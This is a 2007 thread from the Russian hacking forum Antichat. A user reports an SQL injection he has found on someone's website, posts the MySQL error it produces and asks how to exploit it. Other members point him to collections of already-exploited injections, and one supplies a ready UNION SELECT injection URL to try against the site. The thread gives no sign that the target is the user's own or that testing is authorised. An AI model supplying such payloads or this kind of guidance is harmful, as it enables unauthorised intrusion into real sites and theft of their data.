Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Помогите с Sql inj (https://forum.antichat.xyz/showthread.php?t=35722)

Snap 17.03.2007 16:21
Помогите с Sql inj
 
День дорый !!
Нашел уязвимость ввиде SQL Inj на сайте подскажите как может выглядеть примерно запрос если ошибка такая:
http://www.site.ru/'

warning
DBIMySQL: Unable to execute SQL statement SQL: SELECT title, description, keywords FROM nb_metas WHERE page_id=''' Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
/projects/site/www/lib/lib-base.php (2)

XTErner 17.03.2007 16:34
Цитата:
Сообщение от Snap
День дорый !!
Нашел уязвимость ввиде SQL Inj на сайте подскажите как может выглядеть примерно запрос если ошибка такая:
http://www.site.ru/'

warning
DBIMySQL: Unable to execute SQL statement SQL: SELECT title, description, keywords FROM nb_metas WHERE page_id=''' Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
/projects/site/www/lib/lib-base.php (2)

Зашел бы в топик " SQL инькции на сайтах" и посмотрел прымери,чего чего а такого там хватает=\

Snap 17.03.2007 16:35
Смотрел !=( мало что получилось =(

}{0TT@БЬ)Ч 17.03.2007 16:37
вот читай статью http://forum.antichat.ru/thread19605.html
или вот сдесь попадаются уже раздроченные скули для примера http://forum.antichat.ru/thread21336.html
Цитата:
Сообщение от Snap
Смотрел !=( мало что получилось =(
тогда выкладывай ссылку или в пм кидай

Spyder 17.03.2007 16:40
http://www.site.ru/index.php?page_id=-99+union+select+1,2,3/*
Вот так пробуй


Время: 04:56